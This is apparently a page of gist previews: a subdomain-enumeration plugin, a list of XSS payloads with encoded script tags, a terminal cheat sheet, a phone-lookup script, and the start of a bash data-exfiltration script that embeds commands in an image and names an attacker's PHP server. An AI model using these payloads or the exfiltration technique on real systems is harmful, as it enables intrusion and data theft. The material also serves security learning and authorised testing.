This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name = "assetfinder" | |
| type = "ext" | |
| function vertical(ctx, domain) | |
| print("in asset finder") | |
| local cmd = outputdir(ctx) .. "assetfinder --subs-only " .. domain | |
| local data = assert(io.popen(cmd)) | |
| for line in data:lines() do |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Terminal Cheat Sheet | |
| pwd # print working directory | |
| ls # list files in directory | |
| cd # change directory | |
| ~ # home directory | |
| .. # up one directory | |
| - # previous working directory | |
| help # get help | |
| -h # get help |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import webbrowser | |
| areaCode = input("What is the area code of the phone number? ") | |
| middle3 = input("What are the middle 3 digits? ") | |
| last4 = input("What are the last 4 digits? ") | |
| phoneNumber = str(areaCode) + str(middle3) + str(last4) | |
| fourOneOne = "https://www.411.com/phone/" + "1-" + str(areaCode) + "-" + str(middle3) + "-" + str(last4) | |
| webbrowser.open(fourOneOne) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/ | |
| # `if` statement to detemine if the message is a 'response' one | |
| # This is the command being executed and embedded in the photo. | |
| # Single-quotes are used here to help with escaping special | |
| # characters within the desired command(s). | |
| exfilData='ls -lah "/Users/$USER/"' | |
| # Where the attackers PHP server is located. This needs to be |